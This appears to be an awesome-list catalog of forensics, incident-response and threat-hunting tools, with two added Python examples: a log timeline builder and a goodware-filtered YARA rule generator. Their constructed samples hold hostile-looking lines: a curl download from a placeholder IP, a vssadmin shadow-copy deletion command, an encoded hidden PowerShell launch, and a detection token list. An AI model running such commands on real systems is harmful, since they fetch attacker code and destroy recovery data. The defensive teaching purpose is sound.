A PowerShell module for threat hunting and detecting malicious activity via Windows Event Logs.
A PowerShell module for Blue Teams, Incident Responders, and System Administrators to hunt persistence techniques implanted in Windows machines.
A Python-based engine for automatic creation of super timelines from computer system logs and files for digital forensic analysis.
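The core of a super-timeline engine is normalising timestamps from heterogeneous sources into one clock and then sorting. The following is an added example written for this page, not code from the project described above; it assumes three constructed inputs (classic syslog, Apache combined log, and a CSV export of Windows event records in an assumed four-column format) and a case-supplied year and zone for syslog, which carries neither.

```python
import csv
import io
import re
from datetime import datetime, timezone, timedelta

# Constructed sample lines from three evidence sources (not real case data).
SYSLOG_LINES = [
    "Mar  3 14:02:11 web01 sshd[2210]: Accepted publickey for deploy from 203.0.113.9 port 51022 ssh2",
    "Mar  3 14:07:55 web01 sudo: deploy : TTY=pts/0 ; COMMAND=/usr/bin/curl http://198.51.100.23/x.sh",
]
APACHE_LINES = [
    '203.0.113.9 - - [03/Mar/2024:14:03:40 +0000] "GET /wp-login.php HTTP/1.1" 200 512',
]
EVTX_CSV_LINES = [
    # Assumed export layout: ISO-8601 time with offset, EventID, host, message
    "2024-03-03T09:05:02.000-05:00,4624,WKS-07,An account was successfully logged on: CORP\\deploy",
]

SYSLOG_RE = re.compile(r"^(\w{3})\s+(\d{1,2}) (\d{2}:\d{2}:\d{2}) (\S+) (.*)$")
APACHE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')


def parse_syslog(line, year, tz):
    """Classic syslog carries no year and no zone; both come from case context."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    mon, day, clock, host, msg = m.groups()
    local = datetime.strptime(f"{year} {mon} {day} {clock}", "%Y %b %d %H:%M:%S").replace(tzinfo=tz)
    return {"ts": local.astimezone(timezone.utc), "source": "syslog", "host": host, "message": msg}


def parse_apache(line, host):
    """Combined log format embeds its own UTC offset, so no external zone is needed."""
    m = APACHE_RE.match(line)
    if not m:
        return None
    client, ts, request, status, size = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
    return {"ts": when, "source": "apache", "host": host,
            "message": f"{client} {request} -> {status} ({size} bytes)"}


def parse_evtx_csv(line):
    """Assumed CSV export of event records; the timestamp includes an offset."""
    ts, event_id, host, msg = next(csv.reader([line]))
    when = datetime.fromisoformat(ts).astimezone(timezone.utc)
    return {"ts": when, "source": "evtx", "host": host, "message": f"EventID {event_id}: {msg}"}


def build_timeline(syslog_lines, apache_lines, evtx_lines, syslog_year, syslog_tz, apache_host):
    events = []
    events += filter(None, (parse_syslog(l, syslog_year, syslog_tz) for l in syslog_lines))
    events += filter(None, (parse_apache(l, apache_host) for l in apache_lines))
    events += (parse_evtx_csv(l) for l in evtx_lines)
    # Sorting on the normalised UTC timestamp is what turns separate logs into one timeline.
    return sorted(events, key=lambda e: e["ts"])


def to_csv(timeline):
    buf = io.StringIO()
    w = csv.writer(buf)
    w.writerow(["utc_time", "source", "host", "message"])
    for e in timeline:
        w.writerow([e["ts"].strftime("%Y-%m-%dT%H:%M:%SZ"), e["source"], e["host"], e["message"]])
    return buf.getvalue()


if __name__ == "__main__":
    tl = build_timeline(SYSLOG_LINES, APACHE_LINES, EVTX_CSV_LINES, 2024, timezone.utc, "web01")
    print(to_csv(tl))
```

Running it with the syslog host assumed to be in UTC interleaves the Windows logon (09:05 at UTC-5) between the two web-server events; assuming the host was at UTC+2 instead moves both syslog entries two hours earlier and changes the story, which is why the zone assumption must be recorded with the timeline.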
An agile cybersecurity incident management platform for tracking, reporting, and responding to security incidents.
An open-source memory forensic framework for extracting and analyzing digital artifacts from Windows, Linux, and OSX memory images.
A forensics intelligence platform that bridges CTI and DFIR by storing threat intelligence and enabling bulk observable searches and threat-focused analysis.
A Loadable Kernel Module (LKM) for acquiring volatile memory from Linux and Android devices, supporting local disk or network output.
A forensic evidence collection and analysis toolkit for macOS, gathering system data to investigate potential infections.
A forensic evidence collection and analysis toolkit for macOS, gathering system data to detect and investigate malware infections.
A high-performance packet capture solution that buffers all network traffic to disk for fast retrieval of specific subsets.
A Python tool that generates YARA rules for malware detection by filtering out strings and opcodes that appear in goodware.
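The technique behind goodware-filtered rule generation is: extract printable strings from the sample, drop every string also seen in clean software, rank what remains, and emit a rule with a `N of them` condition. The following is an added example written for this page, not the project's own code; the goodware set and the MZ-prefixed sample are constructed stand-ins (a real tool builds the goodware set from a large corpus and also considers opcodes, which this example omits).

```python
import re

# Constructed "goodware" string set. Real tools derive this from many clean binaries;
# this hand-picked stand-in lets the example run offline.
GOODWARE_STRINGS = {
    b"!This program cannot be run in DOS mode.",
    b"KERNEL32.dll", b"GetProcAddress", b"LoadLibraryA", b"ExitProcess", b"VirtualAlloc",
}

# Constructed sample: MZ header, typical import names, and a few attacker strings,
# including one UTF-16LE (wide) string as PowerShell tooling tends to leave behind.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 24
    + b"!This program cannot be run in DOS mode.\x00"
    + b"KERNEL32.dll\x00GetProcAddress\x00LoadLibraryA\x00ExitProcess\x00VirtualAlloc\x00"
    + b"cmd.exe /c vssadmin delete shadows /all /quiet\x00"
    + b"http://198.51.100.23/gate.php\x00"
    + b"Global\\x9f3a-mutex\x00\x00"   # double NUL so the wide scan cannot swallow the trailing 'x'
    + "powershell -nop -w hidden -enc".encode("utf-16-le") + b"\x00\x00"
)

ASCII_RE = re.compile(rb"[\x20-\x7e]{6,}")
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")
SUSPICIOUS_TOKENS = (b"http://", b"cmd.exe", b"powershell", b"vssadmin", b"mutex", b"\\temp\\")


def extract_strings(data):
    """Return (ascii, wide) printable strings; wide ones are collapsed to their ASCII form."""
    ascii_strings = set(ASCII_RE.findall(data))
    wide_strings = {w.replace(b"\x00", b"") for w in WIDE_RE.findall(data)}
    return ascii_strings, wide_strings


def score_string(s):
    """Heuristic ranking: longer strings and attacker-ish tokens score higher."""
    score = min(len(s), 40) // 4
    low = s.lower()
    score += 5 * sum(tok in low for tok in SUSPICIOUS_TOKENS)
    return score


def select_strings(sample, goodware, top_n=5):
    """Goodware filtering step: anything seen in clean software is discarded before ranking."""
    ascii_strings, wide_strings = extract_strings(sample)
    candidates = [(s, False) for s in ascii_strings if s not in goodware]
    candidates += [(s, True) for s in wide_strings if s not in goodware]
    candidates.sort(key=lambda c: (-score_string(c[0]), c[0]))
    return candidates[:top_n]


def yara_escape(s):
    return s.decode("latin-1").replace("\\", "\\\\").replace('"', '\\"')


def generate_rule(name, sample, goodware, top_n=5, min_match=3):
    """Emit a YARA rule, or None when nothing survives the goodware filter."""
    selected = select_strings(sample, goodware, top_n)
    if not selected:
        return None
    lines = [f"rule {name}", "{", "    strings:"]
    for i, (s, wide) in enumerate(selected):
        lines.append(f'        $s{i} = "{yara_escape(s)}" {"wide" if wide else "ascii"}')
    needed = min(min_match, len(selected))
    lines += ["    condition:", f"        uint16(0) == 0x5a4d and {needed} of them", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    print(generate_rule("constructed_sample", SAMPLE, GOODWARE_STRINGS))
```

The import names and the DOS stub text are filtered out because they appear in the goodware set; the four remaining strings are ranked, the wide string keeps its `wide` modifier, and the condition is capped at the number of strings actually emitted. Without the goodware step, `GetProcAddress` would rank as highly as the command line and the rule would fire on most of the file system.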
A repository of publicly-available reports and blogs on APT (Advanced Persistent Threat) campaigns, activity, and software, organized by year.
A collection of ready-to-use KQL queries for threat hunting, detection, and analytics in Microsoft Defender for Endpoint and Azure Sentinel.
A modular PowerShell framework for enterprise incident response and breach hunting using remote data collection.
A collection of real-world malware samples, analysis exercises, and training resources for cybersecurity education and research.
An open-source repository of security detections, analytic stories, and response playbooks mapped to MITRE ATT&CK for Splunk Enterprise Security.
A web-based collaborative platform for incident responders to share technical details during cybersecurity investigations.
A browser forensics tool for analyzing web artifacts from Google Chrome and other Chromium-based browsers.
A PowerShell framework for live disk forensic analysis, supporting NTFS and FAT file systems.
A threat hunting tool that analyzes Windows event logs to detect APT movements and suspicious activity using pre-defined rules and statistical analysis.
A high-performance digital forensics tool that scans disk images and files to extract structured evidence like emails, credit cards, and encoded data.
A portable, extensible incident response tool that automates forensic artifact collection across Unix-like systems.
An automated phishing email analysis tool that extracts observables, integrates with TheHive/Cortex/MISP, and calculates verdicts.
A pre-configured Linux virtual machine for adversary emulation and threat hunting with attacker and defender toolkits.
A community-sourced, machine-readable knowledge base of digital forensic artifacts for use in forensic tools and investigations.
A collection of practical security-focused guides and checklists for smart contract development.
A command-line forensics tool for tracking USB device connection history on GNU/Linux systems.
A collection of operational incident response cheat sheets covering multiple security incident scenarios for CERT teams.
A security feed collection and processing solution for IT security teams using message queuing protocols.
A digital forensics and incident response framework for unified analysis of forensic artifacts across disk formats, filesystems, and operating systems.
A portable volatile memory acquisition tool for Linux that captures memory images without requiring target OS or kernel knowledge.
A framework of Python scripts for blue teams to test detection capabilities against malicious tradecraft modeled after MITRE ATT&CK.
A desktop application for incident responders to track findings, tasks, and visualize timelines during cybersecurity investigations.
AWS incident response runbook templates for DoS/DDoS attacks, credential leakage, and S3 bucket access incidents.
Open-Awesome is built by the community, for the community. Submit a project, suggest an awesome list, or help improve the catalog on GitHub.